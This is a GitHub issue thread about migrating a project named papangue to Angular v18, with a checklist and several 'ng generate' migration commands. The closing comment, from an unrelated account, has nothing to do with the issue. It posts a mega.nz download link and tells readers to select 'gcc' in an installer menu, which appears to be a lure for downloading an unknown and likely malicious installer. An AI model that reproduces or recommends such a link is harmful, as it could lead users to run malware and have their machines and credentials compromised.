### ISSUE TITLE
Migration angular v18

### ISSUE THREAD

**Issue by samakunchan** [samakunchan/papangue#36]
- [x] Debuggage de l'affichage des autres pages.
- [x] router en lazy v18.
- [x] Changer les syntaxes dans le HTML

`ng generate @angular/core:route-lazy-loading`
`ng generate @angular/core:standalone`
`ng generate @angular/core:route-lazy-loading`
`ng generate @angular/core:control-flow`

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
